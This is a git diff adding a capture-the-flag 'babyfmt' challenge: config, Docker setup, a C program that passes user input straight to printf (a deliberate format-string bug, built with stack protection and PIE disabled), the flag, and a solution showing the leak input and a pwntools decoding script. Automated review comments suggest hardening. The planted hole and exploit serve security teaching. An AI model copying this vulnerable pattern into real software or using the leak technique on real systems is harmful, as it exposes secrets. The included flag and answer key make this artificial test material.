diff --git a/pwn/babyfmt/challenge.yml b/pwn/babyfmt/challenge.yml
new file mode 100644
index 0000000..76d806c
--- /dev/null
+++ b/pwn/babyfmt/challenge.yml
@@ -0,0 +1,31 @@
+name: "Babyfmt"
+author: "s3nn"
+category: pwn
+
+description: |
+ What's so bad about printf()?
+
+ https://www.notion.so/apogiatzis/MSc-CTF-Pwn-9ecbafd7791a413dae7d37a24ec27fb9?p=d9b319fe6a3a4766a0033bb2607fec85&pm=s
+
+value: 500
+type: dynamic_docker
+extra:
+ initial: 500
+ minimum: 100
+ decay: 25
+ redirect_type: direct
+ compose_stack: !filecontents docker-compose.yml
+
+
+flags:
+ - GTBQ{l3ak_all_The_t1ngs!!!}
+
+files:
+ - "public/challenge"
+
+tags:
+ - pwn
+ - easy / medium
+
+state: visible
+version: "0.1"
diff --git a/pwn/babyfmt/docker-compose.yml b/pwn/babyfmt/docker-compose.yml
new file mode 100644
index 0000000..172d56b
--- /dev/null
+++ b/pwn/babyfmt/docker-compose.yml
@@ -0,0 +1,11 @@
+services:
+ challenge:
+ restart: always
+ ports:
+ - 1337:1337
+ image: ghcr.io/cybermouflons/gtbq-2024/babyfmt:latest
+ build:
+ context: ./setup
+ dockerfile: Dockerfile
+ labels:
+ ctf.challenge.name: babyfmt
diff --git a/pwn/babyfmt/public/challenge b/pwn/babyfmt/public/challenge
new file mode 100644
index 0000000..7f43ab7
Binary files /dev/null and b/pwn/babyfmt/public/challenge differ
diff --git a/pwn/babyfmt/setup/Dockerfile b/pwn/babyfmt/setup/Dockerfile
new file mode 100644
index 0000000..c9288a3
--- /dev/null
+++ b/pwn/babyfmt/setup/Dockerfile
@@ -0,0 +1,17 @@
+FROM ubuntu:22.04
+
+RUN apt-get update && apt-get install -y socat gcc-multilib
+
+RUN addgroup --system ctf && adduser --system --group ctf
+
+COPY ./challenge /home/ctf
+COPY ./flag.txt /home/ctf
+
+RUN chmod +x /home/ctf/challenge
+RUN chmod +r /home/ctf/flag.txt
+
+USER ctf
+WORKDIR /home/ctf
+
+EXPOSE 1337
+CMD ["socat", "-v","TCP-LISTEN:1337,reuseaddr,fork", "EXEC:'./challenge'"]
diff --git a/pwn/babyfmt/setup/Makefile b/pwn/babyfmt/setup/Makefile
new file mode 100644
index 0000000..32aee19
--- /dev/null
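Review bot: The flag literal under `flags:` in challenge.yml is the same string committed as setup/flag.txt further down in this commit, so the two copies can drift apart and any rotation has to be made in both places. Since the file already uses the `!filecontents` tag for compose_stack, sourcing the flag the same way, e.g. `- !filecontents setup/flag.txt`, would keep a single source of truth, provided the deploy tooling applies that tag to flag entries too (not confirmable from this page).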
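Review bot: The `challenge:` service in docker-compose.yml declares no resource limits, while the Dockerfile's socat command forks a fresh `./challenge` per connection, so a burst of connections can exhaust the host's process and memory budget and take the challenge down for every player. Adding `pids_limit: 256` and `mem_limit: 256m` under the service (illustrative values) bounds that without touching the challenge itself. Worth confirming that the dynamic_docker deploy tooling honours these compose keys.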
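Review bot: `gcc-multilib` is installed into the runtime image even though the binary is copied in prebuilt (`COPY ./challenge`), so a full compiler toolchain plus 32-bit libraries ships in an internet-exposed container for no benefit; the Makefile builds without -m32, so no multilib runtime libraries appear to be needed either. Replacing the install line with `RUN apt-get update && apt-get install -y --no-install-recommends socat && rm -rf /var/lib/apt/lists/*` shrinks the image and its attack surface. Note also that `socat -v` echoes every byte of player input and output to the container's stderr, which is handy while verifying the deployment but will fill the logs with untrusted input afterwards; consider dropping `-v` once it works.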
+++ b/pwn/babyfmt/setup/Makefile
@@ -0,0 +1,5 @@
+all:
+ gcc -fno-stack-protector -no-pie -o challenge ./challenge.c
+
+clean:
+ rm challenge
diff --git a/pwn/babyfmt/setup/challenge b/pwn/babyfmt/setup/challenge
new file mode 100644
index 0000000..7f43ab7
Binary files /dev/null and b/pwn/babyfmt/setup/challenge differ
diff --git a/pwn/babyfmt/setup/challenge.c b/pwn/babyfmt/setup/challenge.c
new file mode 100644
index 0000000..358a05e
--- /dev/null
+++ b/pwn/babyfmt/setup/challenge.c
@@ -0,0 +1,44 @@
+#include
+#include
+#include
+#include
+
+void setup(){
+ setvbuf(stdout, NULL, _IONBF, 0);
+ setvbuf(stdin, NULL, _IONBF, 0);
+ fflush(stdout);
+}
+
+int main() {
+ setup();
+
+ FILE *fptr;
+ char flag[34];
+ fptr = fopen("flag.txt", "r");
+ if (fptr == NULL)
+ {
+ printf("Cannot open file \n");
+ exit(0);
+ }
+ fgets(flag, 34, fptr);
+
+ char fake1[] = "make";
+ char fake2[] = "sure";
+ char fake3[] = "you";
+ char fake4[] = "leak";
+ char fake5[] = "allthethings";
+ char fmtstr[32] = {0};
+
+
+ printf("Plese tell us your name number: ");
+ read(0, fmtstr, 31);
+
+ printf(fmtstr);
+
+ return 0;
+
+}
+
+
+
+
\ No newline at end of file
diff --git a/pwn/babyfmt/setup/flag.txt b/pwn/babyfmt/setup/flag.txt
new file mode 100644
index 0000000..5b880f4
--- /dev/null
+++ b/pwn/babyfmt/setup/flag.txt
@@ -0,0 +1 @@
+GTBQ{l3ak_all_The_t1ngs!!!}
\ No newline at end of file
diff --git a/pwn/babyfmt/sol/sol.md b/pwn/babyfmt/sol/sol.md
new file mode 100644
index 0000000..a853c48
--- /dev/null
+++ b/pwn/babyfmt/sol/sol.md
@@ -0,0 +1,25 @@
+# Leak
+
+Send the following input (might be slightly different on systems)
+```
+%14$p.%15$p.%16$p.%17$p
+```
+
+# Unhex:
+
+```python
+
+from pwn import *
+
+sol = b''
+
+a = '0x61336c7b51425447.0x68545f6c6c615f6b.0x2173676e31745f65.0x7d2121'.replace('0x','')
+flag = a.split('.')
+
+for part in flag:
+ sol += unhex(part)[::-1]
+
+log.success(sol)
+
+```
+
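Review bot: In main of challenge.c the return value of `fgets(flag, 34, fptr)` is unchecked and `fptr` is never closed, so an empty or unreadable flag.txt leaves `flag` as uninitialised stack bytes that the program goes on to expose, and the stream is leaked until exit. Changing it to `if (fgets(flag, sizeof flag, fptr) == NULL) { exit(0); }` followed by `fclose(fptr);` keeps the intended behaviour for a well-formed flag file. The unchecked `read(0, fmtstr, 31)` is harmless here because fmtstr is zero-initialised, and `printf(fmtstr)` on a non-literal buffer is the challenge's intentional format-string bug; a comment such as `/* intentional: the format-string bug IS the challenge (triggers -Wformat-security) */` stops a well-meaning maintainer from patching it out. The four `#include` lines show no header names, which looks like angle brackets lost in rendering rather than the committed file, but it is worth confirming since a bare `#include` does not compile.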